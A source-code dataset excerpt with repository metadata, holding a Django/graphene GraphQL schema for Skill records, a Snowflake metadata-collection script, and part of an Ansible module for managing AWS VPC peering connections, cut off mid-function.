        model = SkillModel
        # Fields clients may filter and order by in connection queries.
        filter_fields = ['id', 'name', 'description',
                         'verified', 'weight', 'skillset_id']
        filter_order_by = ['id', 'name', 'description',
                           'verified', 'weight', 'skillset_id']
class SkillFilter(FilterSet):
    """django-filter FilterSet for Skill; mirrors Skill.Meta.filter_fields."""
    class Meta:
        model = SkillModel
        fields = ['id', 'name', 'description',
                  'verified', 'weight', 'skillset_id']
class SkillQuery(graphene.AbstractType):
    """Root query fields for skills."""
    skill = graphene.Field(Skill)
    skills = graphene.List(Skill)

    @graphene.resolve_only_args
    def resolve_skill(self):
        # NOTE(review): always returns the first Skill row; there is no id
        # argument -- confirm this is intentional (e.g. a sample resolver).
        return SkillModel.objects.first()

    @graphene.resolve_only_args
    def resolve_skills(self):
        return SkillModel.objects.all()
# def create_skill(name, description, skillset_id):
# new_skill = Skill(
# name=name,
# description=description,
# skillset_id=skillset_id
# )
# new_skill.save()
# return new_skill
class CreateSkill(graphene.Mutation):
    """Mutation that creates a new Skill and returns it."""

    class Input:
        name = graphene.String(required=True)
        description = graphene.String()
        verified = graphene.Boolean()
        weight = graphene.Int()
        skillset_id = graphene.Int(required=True)

    skill = graphene.Field(Skill)

    def mutate(self, args, context, info):
        """Create and save a Skill from the mutation input.

        Bug fix: the previous code called SkillModel(name, description,
        skillset_id) with positional arguments -- Django maps positionals
        onto fields in declaration order starting with the auto 'id' primary
        key, so the values landed in the wrong columns.  Keyword arguments
        are used instead, and the optional 'verified'/'weight' inputs, which
        were accepted but silently ignored, are now honoured.
        """
        new_skill = SkillModel(
            name=args.get('name'),
            description=args.get('description'),
            skillset_id=args.get('skillset_id'),
        )
        # Apply optional inputs only when supplied, keeping model defaults.
        if args.get('verified') is not None:
            new_skill.verified = args.get('verified')
        if args.get('weight') is not None:
            new_skill.weight = args.get('weight')
        new_skill.save()
        return CreateSkill(skill=new_skill)
class UpdateSkill(graphene.Mutation):
    """Mutation that partially updates an existing Skill by id."""

    class Input:
        id = graphene.Int(required=True)
        name = graphene.String()
        description = graphene.String()
        verified = graphene.Boolean()
        weight = graphene.Int()
        skillset_id = graphene.Int()

    skill = graphene.Field(Skill)

    def mutate(self, args, context, info):
        """Load the Skill, apply only the supplied fields, save and return it.

        Raises SkillModel.DoesNotExist when the id is unknown (surfaced as a
        GraphQL error).
        """
        id = args.get('id')
        skill = SkillModel.objects.get(pk=id)
        # Only these fields are updatable; None values (unsupplied inputs)
        # are filtered out so existing data is preserved.
        keys = ['name', 'description', 'verified', 'weight', 'skillset_id']
        attr_map = {
            k: v for k, v in args.items()
            if k in keys and v is not None}
        skill = assign_attrs(attr_map, skill)
        skill.save()
        return UpdateSkill(skill=skill)
class DeleteSkill(graphene.Mutation):
    """Mutation that deletes a Skill by id, returning the deleted instance."""

    class Input:
        id = graphene.Int(required=True)

    skill = graphene.Field(Skill)

    def mutate(self, args, context, info):
        id = args.get('id')
        skill = SkillModel.objects.get(pk=id)
        # The in-memory instance remains usable after delete() for the return
        # payload, though its database row is gone.
        skill.delete()
        return DeleteSkill(skill=skill)
|
[
"angiegrace84@gmail.com"
] |
angiegrace84@gmail.com
|
0f85274a33880807fc975d50c64d8e2e3d605d2c
|
58b7a0570184e5a38beeddaa7dc7dfd959213103
|
/snowflake/db_level_metadata/db_meta_collection.py
|
d5a8521191e062a9e187df46ca07a20ecdc8151d
|
[] |
no_license
|
sagarch1234/snowflake
|
89bd1a6d52f2f1fb25b6673080572991375995e4
|
644b52275a122ebbaf4ec51a0f4184b993f964e7
|
refs/heads/master
| 2023-03-06T14:04:40.646357
| 2021-02-11T14:17:21
| 2021-02-11T14:17:21
| 337,696,236
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,071
|
py
|
import sys
import os
sys.path.insert(1, '/snowflake-backend/snowflake/instance_connector')
import snowflake.connector
import constants
from queries_and_tables import queries_tables_list
from connection import SnowflakeConnector
from get_data import GetCustomerData
from load_data import LoadData
from associate_data import AssociateData
from snowflake.sqlalchemy import URL
from sqlalchemy import create_engine
import pandas as pd
class CollectMetaData():
    """Collects per-database metadata from a customer Snowflake account and
    loads it, tagged with customer/user context, into SFO's Snowflake."""

    def __init__(self, account, user, password, user_id, company_id, event, instance_id):
        #other arguments for associate data.
        self.instance_id = instance_id
        self.event = event
        self.company_id = company_id
        self.user_id = user_id
        #connect to customer snowflake instance
        self.customer_engine = create_engine(URL(account = account, user = user, password = password, role='ACCOUNTADMIN'))
        self.customer_connector = self.customer_engine.connect()
        #connect to SFO's snowflake instance (credentials from environment)
        self.sfo_connector = SnowflakeConnector(user=os.environ.get('SNOWFLAKE_ACCOUNT_USER'), password=os.environ.get('SNOWFLAKE_ACCOUNT_PASSWORD'), account=os.environ.get('SNOWFLAKE_ACCOUNT'), database_name=os.environ.get('SNOWFLAKE_DATABASE_NAME'), schema_name=os.environ.get('SCHEMA_NAME_AUDITS'), role=os.environ.get('ACCOUNT_ROLE'), warehouse=os.environ.get('ACCOUNT_WAREHOUSE'))
        self.sfo_engine = self.sfo_connector.get_engine()
        self.sfo_con = self.sfo_connector.connect_snowflake_instance()
        #get data object
        self.get_data = GetCustomerData(self.customer_engine)
        #associate data object
        self.associate = AssociateData(instance_id=self.instance_id, user_id=self.user_id, event=self.event, company_id=self.company_id)
        #load data
        self.load_data = LoadData(engine=self.sfo_engine, connection=self.sfo_con)
        #df of customer's databases
        # NOTE(review): 'df' is a dead alias created by the chained
        # assignment; only self.databases is used afterwards.
        self.databases = df = pd.read_sql_query("show databases;", self.customer_engine)

    def collect_process_dump(self, sql, table_name, index_label):
        """Run `sql` against every customer database, tag the combined result
        with customer context, and dump it into `table_name` on SFO's side.
        Returns None (the final assignment's value is unused)."""
        final_df = pd.DataFrame()
        for database in self.databases['name']:
            #get_data
            customer_df = self.get_data.get_data(sql, database)
            # NOTE(review): DataFrame.append is deprecated in modern pandas
            # (use pd.concat) and is O(n^2) when called in a loop -- confirm
            # the pinned pandas version before changing.
            final_df = final_df.append(customer_df)
        #associate_data
        associated_df = self.associate.associate_data(dataframe=final_df)
        #load_data
        load_data = self.load_data.dump_data(table_name=table_name, dataframe=associated_df, index_label=index_label)
if __name__ == '__main__':
    # SECURITY FIX: account, user and a plain-text password were hard-coded in
    # source here. Read them from the environment instead; never commit secrets.
    # (The previously committed password must be rotated.)
    obj = CollectMetaData(
        account=os.environ.get('CUSTOMER_SNOWFLAKE_ACCOUNT'),
        user=os.environ.get('CUSTOMER_SNOWFLAKE_USER'),
        password=os.environ.get('CUSTOMER_SNOWFLAKE_PASSWORD'),
        user_id=2,
        company_id=4,
        event="AUDITS",
        instance_id=4,
    )
    # One collection pass per (query, target table, index label) triple.
    for queries_tables in queries_tables_list:
        print(">>>>>>>>>>", queries_tables)
        obj.collect_process_dump(sql=queries_tables[0], table_name=queries_tables[1],
                                 index_label=queries_tables[2])
|
[
"jpatel99967@gmail.com"
] |
jpatel99967@gmail.com
|
729a1afce0efb407c5472d53041bc3864d6c1a96
|
1683174856297e64b2330a03fc876d0328509d03
|
/playbooks/library/ec2_vpc_peer.py
|
a787ba96042f3e2578e8816da600c23bf6b8197e
|
[] |
no_license
|
missnebun/ansible-examples
|
352e146dbf7bcf7d3313cb1e26d7852c923e405e
|
3525cf6c1dce79b05b83f391372ce5c5e89a4289
|
refs/heads/master
| 2020-12-26T10:40:51.616774
| 2016-08-08T23:02:19
| 2016-08-08T23:02:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 49,814
|
py
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
module: ec2_vpc_peer
short_description: create, delete, accept, and reject VPC peering connections between two VPCs.
description:
- Read the AWS documentation for VPC Peering Connections
U(http://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/vpc-peering.html)
version_added: "2.1"
author: Allen Sanabria(@linuxdynasty)
extends_documentation_fragment: aws
requirements: [boto3, botocore]
options:
accept_peer:
description:
- If set to yes, the newly created peering connection will be accepted.
required: false
accept_with_profile:
description:
- The boto3 profile to use when you are auto accepting a cross account peer.
required: false
accepter_routes:
description:
- List of route table ids. These route tables will be updated with the
- CIDR block of the vpc_id using the vpc_peering_id that is generated when the peer is created.
required: false
requester_routes:
description:
- List of route table ids. These route tables will be updated with the
- CIDR block of the vpc_peer_id using the vpc_peering_id that is generated when the peer is created.
required: false
resource_tags:
description:
- Dictionary of Tags to apply to the newly created peer.
required: false
vpc_id:
description:
- VPC id of the requesting VPC.
required: false
peer_vpc_id:
description:
- VPC id of the accepting VPC.
required: false
peer_owner_id:
description:
- The AWS account number for cross account peering.
required: false
state:
description:
- Create, delete, accept, reject a peering connection.
required: false
default: present
choices: ['present', 'absent', 'accept', 'reject']
'''
EXAMPLES = '''
# Complete example to create and accept a local peering connection and auto accept.
- name: Create local account VPC peering Connection and auto accept
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_peer: yes
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
# Complete example to create and accept a local peering connection and auto
# accept as well as add routes to the requester CIDR (The CIDR block of the vpc_id)
# using the newly created peering connection id.
- name: Create local account VPC peering Connection and auto accept and add routes
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_peer: yes
requester_routes:
- rtb-12345678
- rtb-98765432
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
# Complete example to create and accept a local peering connection and auto
# accept as well as add routes to the accepter CIDR (The CIDR block of the vpc_peer_id)
# using the newly created peering connection id.
- name: Create local account VPC peering Connection and auto accept and add routes
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_peer: yes
accepter_routes:
- rtb-12345678
- rtb-98765432
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
# Complete example to create and accept a cross account peering connection and auto accept.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create cross account VPC peering Connection and auto accept
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_with_profile: boto3_profile_goes_here
peer_owner_id: 12345678910
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
# Complete example to delete a local account peering connection.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create cross account VPC peering Connection and auto accept
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
- name: delete a VPC peering Connection
ec2_vpc_peer:
region: us-west-2
peering_id: "{{ vpc_peer.vpc_peering_connection_id }}"
state: absent
register: vpc_peer
# Complete example to delete a cross account peering connection.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create cross account VPC peering Connection and auto accept
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
accept_with_profile: boto3_profile_goes_here
peer_owner_id: 12345678910
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
- name: delete a cross account VPC peering Connection
ec2_vpc_peer:
region: us-west-2
peering_id: "{{ vpc_peer.vpc_peering_connection_id }}"
state: absent
profile: boto3_profile_goes_here
register: vpc_peer
# Complete example to reject a local account peering connection.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create VPC peering Connection.
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
- name: Reject a VPC peering Connection
ec2_vpc_peer:
region: us-west-2
peering_id: "{{ vpc_peer.vpc_peering_connection_id }}"
state: reject
register: vpc_peer
# Complete example to reject a cross account peering connection.
# Boto3 profile for the other account must exist in ~/.aws/credentials
- name: Create cross account VPC peering Connection.
ec2_vpc_peer:
region: us-west-2
vpc_id: vpc-12345678
peer_vpc_id: vpc-87654321
state: present
peer_owner_id: 12345678910
resource_tags:
- Name: new_peer
- Env: development
register: vpc_peer
- name: Reject a cross account VPC peering Connection
ec2_vpc_peer:
region: us-west-2
peering_id: "{{ vpc_peer.vpc_peering_connection_id }}"
state: reject
profile: boto3_profile_goes_here
register: vpc_peer
'''
RETURN = '''
success:
description: Returns true if all succeeded and false if it failed.
returned: In all cases.
type: bool
sample: true
changed:
description: Returns true if action made a changed and false if it didn't.
returned: In all cases.
type: bool
sample: true
status:
description: Dictionary containing the message and code.
returned: Success.
type: dictionary
sample:
{
"message": "Active",
"code": "active"
}
tags:
description: List of dictionaries containing the key, val of each tag.
returned: Success.
type: list
sample:
[
{
"value": "web",
"key": "service"
}
]
accepter_vpc_info:
description: Dictionary containing the owner_id, vpc_id, and cidr_block.
returned: Success.
type: dictionary
sample:
{
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "172.31.0.0/16"
}
vpc_peering_connection_id:
description: The peering connection id.
returned: Success.
type: string
sample: pcx-12345678
requester_vpc_info:
description: Dictionary containing the owner_id, vpc_id, and cidr_block.
returned: Success.
type: dictionary
sample:
{
"owner_id": "12345678910",
"vpc_id": "vpc-12345678",
"cidr_block": "10.100.0.0/16"
}
'''
# boto3/botocore are optional at import time: HAS_BOTO3 records whether they
# imported so the module can fail with a clear error message instead of an
# ImportError traceback (standard Ansible module pattern).
try:
    import botocore
    import boto3
    import boto3.session
    HAS_BOTO3 = True
except ImportError:
    HAS_BOTO3 = False
import datetime
import re
def create_client_with_profile(profile_name, region, resource_name='ec2'):
    """Build a boto3 client from a named profile in ~/.aws/credentials.

    Args:
        profile_name (str): Profile name from ~/.aws/credentials.
        region (str): AWS region to connect to.
        resource_name (str): AWS service name (default 'ec2').

    Returns:
        Tuple (client or None, err_msg): the client on success with an empty
        error string, or (None, message) on any failure.
    """
    try:
        session = boto3.session.Session(
            profile_name=profile_name, region_name=region
        )
        return session.client(resource_name), ''
    except Exception as err:
        return None, str(err)
def convert_to_lower(data):
    """Recursively convert CamelCase dict keys to snake_case.

    datetime values anywhere in the structure are converted to ISO-8601
    strings; lists are converted element-wise; other non-dict values pass
    through unchanged.

    BUG FIX: the original returned {} for ANY non-dict input, which destroyed
    scalar items inside lists (e.g. {'Values': ['vpc-1']} became
    {'values': [{}]}) and broke callers that pass a list at the top level.

    Args:
        data: Arbitrary structure of dicts/lists/scalars (AWS API output).

    Returns:
        The converted structure (same shape as the input).
    """
    if isinstance(data, datetime.datetime):
        return data.isoformat()
    if isinstance(data, list):
        return [convert_to_lower(item) for item in data]
    if not isinstance(data, dict):
        return data
    results = dict()
    for key, val in data.items():
        # 'VpcId' -> '_vpc_id' -> 'vpc_id'
        key = re.sub('([A-Z]{1})', r'_\1', key).lower()
        if key and key[0] == '_':
            key = key[1:]
        results[key] = convert_to_lower(val)
    return results
def find_tags(client, resource_id, check_mode=False):
    """Retrieve all tags for an Amazon resource id.

    Args:
        client (botocore.client.EC2): Boto3 client.
        resource_id (str): The Amazon resource id.

    Kwargs:
        check_mode (bool): Pass DryRun to the AWS API call. default=False

    Returns:
        Tuple (success, err_msg, tags): tags is a list of
        {'Key': ..., 'Value': ...} dicts.
    """
    success = False
    err_msg = ''
    current_tags = list()
    search_params = {
        'Filters': [
            {
                'Name': 'resource-id',
                'Values': [resource_id]
            }
        ],
        'DryRun': check_mode
    }
    try:
        current_tags = client.describe_tags(**search_params)['Tags']
        success = True
        # Strip fields callers don't use so each entry matches the Tag
        # format ({'Key': ..., 'Value': ...}) used elsewhere in this module.
        for tag in current_tags:
            tag.pop('ResourceType', None)
            tag.pop('ResourceId', None)
    # BUG FIX: the original used Python 2-only `except X, e:` syntax (a
    # SyntaxError on Python 3; the file already uses `as e` elsewhere) and
    # `e.message`, which does not exist on Python 3 exceptions.
    except botocore.exceptions.ClientError as e:
        if e.response['Error']['Code'] == 'DryRunOperation':
            success = True
        err_msg = str(e)
    return success, err_msg, current_tags
def describe_peering_connections(client, vpc_id=None, vpc_peer_id=None,
                                 vpc_peering_id=None, status_codes=None,
                                 check_mode=False):
    """Look up peering connections by id, or by requester/accepter VPC pair.

    Args:
        client (botocore.client.EC2): Boto3 client.

    Kwargs:
        vpc_id (str): The requester vpc id.
        vpc_peer_id (str): The accepter vpc id.
        vpc_peering_id (str): The vpc peering connection id (used when the
            vpc pair is not given).
        status_codes (list): Optional status-code filter values
            (e.g. ['pending-acceptance', 'active']).
        check_mode (bool): Pass DryRun to the AWS API call. default=False

    Returns:
        Tuple (success, err_msg, connections): connections is the raw
        'VpcPeeringConnections' list from the API.
    """
    success = False
    err_msg = ''
    result = list()
    params = {
        'DryRun': check_mode
    }
    if vpc_id and vpc_peer_id:
        params['Filters'] = [
            {
                'Name': 'requester-vpc-info.vpc-id',
                'Values': [vpc_id],
            },
            {
                'Name': 'accepter-vpc-info.vpc-id',
                'Values': [vpc_peer_id],
            }
        ]
        if status_codes:
            params['Filters'].append(
                {
                    'Name': 'status-code',
                    'Values': status_codes
                }
            )
    elif vpc_peering_id:
        params['VpcPeeringConnectionIds'] = [vpc_peering_id]
        if status_codes:
            params['Filters'] = [
                {
                    'Name': 'status-code',
                    'Values': status_codes
                }
            ]
    try:
        result = (
            client.describe_vpc_peering_connections(**params)
            ['VpcPeeringConnections']
        )
        success = True
    # BUG FIX: Python 2-only `except X, e:` replaced with `as e`; `e.message`
    # replaced with str(e) (removed on Python 3).
    except botocore.exceptions.ClientError as e:
        if e.response['Error']['Code'] == 'DryRunOperation':
            success = True
        err_msg = str(e)
    return success, err_msg, result
def _has_status(peering_conn, code):
    """True when *peering_conn*'s status code equals *code*."""
    return peering_conn['status']['code'] == code

def is_active(peering_conn):
    """True when the peering connection is 'active'."""
    return _has_status(peering_conn, 'active')

def is_deleted(peering_conn):
    """True when the peering connection is 'deleted'."""
    return _has_status(peering_conn, 'deleted')

def is_expired(peering_conn):
    """True when the peering connection is 'expired'."""
    return _has_status(peering_conn, 'expired')

def is_failed(peering_conn):
    """True when the peering connection is 'failed'."""
    return _has_status(peering_conn, 'failed')

def is_initiating_request(peering_conn):
    """True when the peering connection is 'initiating-request'."""
    return _has_status(peering_conn, 'initiating-request')

def is_pending(peering_conn):
    """True when the peering connection is 'pending-acceptance'."""
    return _has_status(peering_conn, 'pending-acceptance')

def is_provisioning(peering_conn):
    """True when the peering connection is 'provisioning'."""
    return _has_status(peering_conn, 'provisioning')

def is_rejected(peering_conn):
    """True when the peering connection is 'rejected'."""
    return _has_status(peering_conn, 'rejected')
def make_tags_in_proper_format(tags):
    """Collapse AWS-format tags into single-entry {key: value} dicts.

    Args:
        tags (list): Tags in AWS format, e.g. [{'Key': 'env', 'Value': 'dev'}].

    Returns:
        List of one-entry dicts, e.g. [{'env': 'dev'}].
    """
    return [{entry.get('Key'): entry.get('Value')} for entry in tags]
def convert_list_of_tags(tags):
    """Flatten a list of AWS Tag dicts into one {key: value} dictionary.

    Args:
        tags (list): Tags in AWS format, e.g. [{'Key': 'env', 'Value': 'dev'}].

    Returns:
        Dict mapping tag key to tag value, e.g. {'env': 'dev'}.
    """
    lowered = [convert_to_lower(entry) for entry in tags]
    return {entry.get('key'): entry.get('value') for entry in lowered}
def make_tags_in_aws_format(tags):
    """Expand a {key: value} dict into AWS Tag format.

    Args:
        tags (dict): Tags to apply, e.g. {'env': 'dev'}.

    Returns:
        List of AWS Tag dicts, e.g. [{'Key': 'env', 'Value': 'dev'}].
    """
    return [{'Key': tag_key, 'Value': tag_value}
            for tag_key, tag_value in tags.items()]
def tags_action(client, resource_id, tags, action='create', check_mode=False):
    """Create or delete tags on an Amazon resource.

    Args:
        client (botocore.client.EC2): Boto3 client.
        resource_id (str): The Amazon resource id.
        tags (list): Tags in AWS format ([{'Key': ..., 'Value': ...}]).

    Kwargs:
        action (str): 'create' or 'delete'. default='create'
        check_mode (bool): Pass DryRun to the AWS API call. default=False

    Returns:
        Tuple (success, err_msg)
    """
    success = False
    err_msg = ""
    params = {
        'Resources': [resource_id],
        'Tags': tags,
        'DryRun': check_mode
    }
    try:
        if action == 'create':
            client.create_tags(**params)
            success = True
        elif action == 'delete':
            client.delete_tags(**params)
            success = True
        else:
            err_msg = 'Invalid action {0}'.format(action)
    # BUG FIX: Python 2-only `except X, e:` replaced with `as e`; `e.message`
    # replaced with str(e) (removed on Python 3).
    except botocore.exceptions.ClientError as e:
        if e.response['Error']['Code'] == 'DryRunOperation':
            success = True
        err_msg = str(e)
    return success, err_msg
def recreate_tags_from_list(list_of_tags):
    """Convert a list of (key, value) tuples into AWS Tag format.

    Dead code removed from the original: an unused counter, a pointless
    self-assignment, and an index-based loop. Behaviour is unchanged.

    Args:
        list_of_tags (list): List of (key, value) tuples,
            e.g. [('Env', 'Development')].

    Returns:
        List of AWS Tag dicts, e.g. [{'Key': 'Env', 'Value': 'Development'}].
    """
    return [{'Key': key_name, 'Value': key_val}
            for key_name, key_val in list_of_tags]
def update_routes(client, vpc_peering_id, cidr, route_table_ids,
                  check_mode=False):
    """Create a route to *cidr* via the peering connection in each route table.

    Args:
        client (botocore.client.EC2): Boto3 client.
        vpc_peering_id (str): The vpc peering connection id.
        cidr (str): Destination CIDR block, e.g. '10.0.0.0/16'.
        route_table_ids (list): Route table ids to update.

    Kwargs:
        check_mode (bool): Pass DryRun to the AWS API call. default=False

    Returns:
        Tuple (success, changed, err_msg)
    """
    success = False
    changed = False
    err_msg = ''
    for route_table_id in route_table_ids:
        params = {
            'RouteTableId': route_table_id,
            'DestinationCidrBlock': cidr,
            'VpcPeeringConnectionId': vpc_peering_id,
            'DryRun': check_mode,
        }
        try:
            completed = client.create_route(**params)
            if completed.get('Return'):
                success, changed = True, True
        # BUG FIX: Python 2-only `except X, e:` replaced with `as e`;
        # `e.message` replaced with str(e) (removed on Python 3).
        except botocore.exceptions.ClientError as e:
            err_msg = str(e)
            if e.response['Error']['Code'] == 'DryRunOperation':
                success = True
            elif re.search('RouteAlreadyExists', err_msg):
                # An identical route already existing is not a failure.
                success = True
    return success, changed, err_msg
def pre_update_routes(client, peer_info, accepter_routes=None,
                      requester_routes=None, check_mode=False):
    """Add routes through an existing peering connection.

    For each supplied route-table list, points that side's CIDR block at the
    peering connection described by *peer_info* (the lower-cased output of
    describe_peering_connections).

    Args:
        client (botocore.client.EC2): Boto3 client.
        peer_info (dict): One converted entry from
            describe_peering_connections.

    Kwargs:
        accepter_routes (list): Route table ids to point at the accepter CIDR.
        requester_routes (list): Route table ids to point at the requester CIDR.
        check_mode (bool): DryRun flag. default=False

    Returns:
        Tuple (success, changed, err_msg)
    """
    success = False
    changed = False
    err_msg = 'Need to pass either accepter_routes or requester_routes.'
    peering_id = peer_info['vpc_peering_connection_id']
    # (route tables to update, which side's CIDR they should point at)
    for route_ids, info_key in (
            (accepter_routes, 'accepter_vpc_info'),
            (requester_routes, 'requester_vpc_info')):
        if not route_ids:
            continue
        cidr = peer_info[info_key].get('cidr_block', None)
        if cidr:
            # NOTE(review): check_mode is deliberately not forwarded here,
            # matching the original call — confirm whether that is intended.
            success, changed, err_msg = (
                update_routes(client, peering_id, cidr, route_ids)
            )
    return success, changed, err_msg
def update_tags(client, resource_id, tags, check_mode=False):
    """Reconcile the tags on *resource_id* with *tags*.

    Tags present on the resource but absent from *tags* are deleted; new or
    changed tags are created.

    BUG FIXES vs the original:
    - `reduce` is not a builtin on Python 3 (would raise NameError); the
      flattening is done with set.update instead.
    - `dict.items()` views cannot be concatenated with `+` on Python 3.
    - `delete_success` could be referenced before assignment when there was
      nothing to delete.
    - `reduce` over an empty tag list raised TypeError.
    - check_mode is now forwarded to tags_action (it was hard-coded False).

    Args:
        client (botocore.client.EC2): Boto3 client.
        resource_id (str): The Amazon resource id.
        tags (list): Desired tags in AWS format ([{'Key': ..., 'Value': ...}]).

    Kwargs:
        check_mode (bool): Pass DryRun to the AWS API calls. default=False

    Returns:
        Tuple (success, err_msg)
    """
    def _tag_pairs(tag_list):
        # Flatten AWS-format tags into a set of (key, value) pairs.
        pairs = set()
        for entry in make_tags_in_proper_format(tag_list):
            pairs.update(entry.items())
        return pairs

    success = False
    err_msg = ''
    find_success, _find_err, current_tags = (
        find_tags(client, resource_id, check_mode=check_mode)
    )
    if not find_success:
        return success, err_msg
    delete_success, delete_msg = True, ''
    if current_tags:
        current_tags_set = _tag_pairs(current_tags)
        new_tags_set = _tag_pairs(tags)
        tags_to_delete = list(current_tags_set.difference(new_tags_set))
        tags_to_update = list(new_tags_set.difference(current_tags_set))
        if tags_to_delete:
            delete_success, delete_msg = tags_action(
                client, resource_id, recreate_tags_from_list(tags_to_delete),
                action='delete', check_mode=check_mode
            )
            if not delete_success:
                return delete_success, delete_msg
        if tags_to_update:
            tags = recreate_tags_from_list(tags_to_update)
        if not tags:
            # Nothing left to create; report the delete outcome.
            return delete_success, delete_msg
    if tags:
        return tags_action(
            client, resource_id, tags, action='create', check_mode=check_mode
        )
    return success, err_msg
def runner(client, state, params):
    """Dispatch a create/delete/accept/reject call for a peering connection.

    Should only be called by run().

    Args:
        client (botocore.client.EC2): Boto3 client.
        state (str): One of 'accept', 'reject', 'absent', 'present'.
        params (dict): Keyword arguments for the corresponding AWS API call.

    Returns:
        Tuple (success, changed, err_msg, result): result is the converted
        (snake_case) 'VpcPeeringConnection' payload when present.
    """
    success = False
    changed = False
    err_msg = ''
    result = dict()
    invocations = {
        'accept': client.accept_vpc_peering_connection,
        'reject': client.reject_vpc_peering_connection,
        'absent': client.delete_vpc_peering_connection,
        'present': client.create_vpc_peering_connection,
    }
    if state not in invocations:
        return success, changed, err_msg, result
    try:
        result = invocations[state](**params)
        response = result.pop('ResponseMetadata')
        if result.get('VpcPeeringConnection', {}):
            result = result.pop('VpcPeeringConnection')
        if response['HTTPStatusCode'] == 200:
            changed = True
            success = True
        else:
            # FIX: corrected 'occured' typo in the error message.
            err_msg = "Failure occurred, please check aws console"
        result = convert_to_lower(result)
    # BUG FIX: Python 2-only `except X, e:` replaced with `as e`; `e.message`
    # replaced with str(e) (removed on Python 3).
    except botocore.exceptions.ClientError as e:
        if e.response['Error']['Code'] == 'DryRunOperation':
            success = True
        err_msg = str(e)
    return success, changed, err_msg, result
def run(client, vpc_peering_id, state, check_mode=False):
    """Drive a peering connection toward *state* based on its current status.

    Called by accept, reject and delete. Looks the connection up first and
    only acts when the transition is legal: accept/reject/delete from
    'pending-acceptance', delete from 'active'.

    Args:
        client (botocore.client.EC2): Boto3 client.
        vpc_peering_id (str): The vpc peering connection id.
        state (str): One of 'accept', 'reject', 'absent', 'present'.

    Kwargs:
        check_mode (bool): Pass DryRun to the AWS API calls. default=False

    Returns:
        Tuple (success, changed, err_msg, result)
    """
    changed = False
    success, err_msg, results = (
        describe_peering_connections(
            client, vpc_peering_id=vpc_peering_id,
            status_codes=['pending-acceptance', 'active'],
            check_mode=check_mode
        )
    )
    params = {
        'VpcPeeringConnectionId': vpc_peering_id,
        'DryRun': check_mode,
    }
    if success and results:
        results = convert_to_lower(results[0])
        # Pre-set a refusal message; it is overwritten if a transition runs.
        err_msg = (
            'Can not {0} on a {1} state: peer: {2}'
            .format(state, results['status']['code'], vpc_peering_id)
        )
        if is_pending(results):
            # accept, reject and delete are all legal from pending-acceptance.
            if state == 'accept' or state == 'absent' or state == 'reject':
                success, changed, err_msg, results = (
                    runner(client, state, params)
                )
        elif is_active(results):
            # Only deletion is legal once the peer is active.
            if state == 'absent':
                success, changed, err_msg, results = (
                    runner(client, state, params)
                )
    elif len(results) == 0:
        success = False
        err_msg = (
            'Can not {0} a peer does not exist: {1}-{2}'
            .format(state, err_msg, vpc_peering_id)
        )
    return success, changed, err_msg, convert_to_lower(results)
def accept(client, vpc_peering_id, check_mode=False):
    """Accept a pending VPC peering connection.

    Thin wrapper around run() with state='accept'; the result payload is
    always returned as an empty dict.

    Args:
        client (botocore.client.EC2): Boto3 client.
        vpc_peering_id (str): The vpc peering connection id.

    Kwargs:
        check_mode (bool): Pass DryRun to the AWS API calls. default=False
    """
    outcome = run(client, vpc_peering_id, 'accept', check_mode=check_mode)
    return outcome[0], outcome[1], outcome[2], {}
def reject(client, vpc_peering_id, check_mode=False):
    """Reject a pending VPC peering connection.

    Thin wrapper around run() with state='reject'; the result payload is
    always returned as an empty dict.

    Args:
        client (botocore.client.EC2): Boto3 client.
        vpc_peering_id (str): The vpc peering connection id.

    Kwargs:
        check_mode (bool): Pass DryRun to the AWS API calls. default=False
    """
    outcome = run(client, vpc_peering_id, 'reject', check_mode=check_mode)
    return outcome[0], outcome[1], outcome[2], {}
def delete(client, vpc_peering_id, check_mode=False):
    """Delete a VPC peering connection.

    Thin wrapper around run() with state='absent'; the result payload is
    always returned as an empty dict.

    Args:
        client (botocore.client.EC2): Boto3 client.
        vpc_peering_id (str): The vpc peering connection id.

    Kwargs:
        check_mode (bool): Pass DryRun to the AWS API calls. default=False
    """
    outcome = run(client, vpc_peering_id, 'absent', check_mode=check_mode)
    return outcome[0], outcome[1], outcome[2], {}
def update(client, vpc_peering_id, tags, accept_peer=False,
           accept_with_profile=None, region=None,
           accepter_routes=None, requester_routes=None, check_mode=False):
    """Tag an existing peering connection and optionally accept it and add routes.

    Args:
        client (botocore.client.EC2): Boto3 client (requesting account).
        vpc_peering_id (str): The vpc peering connection id.
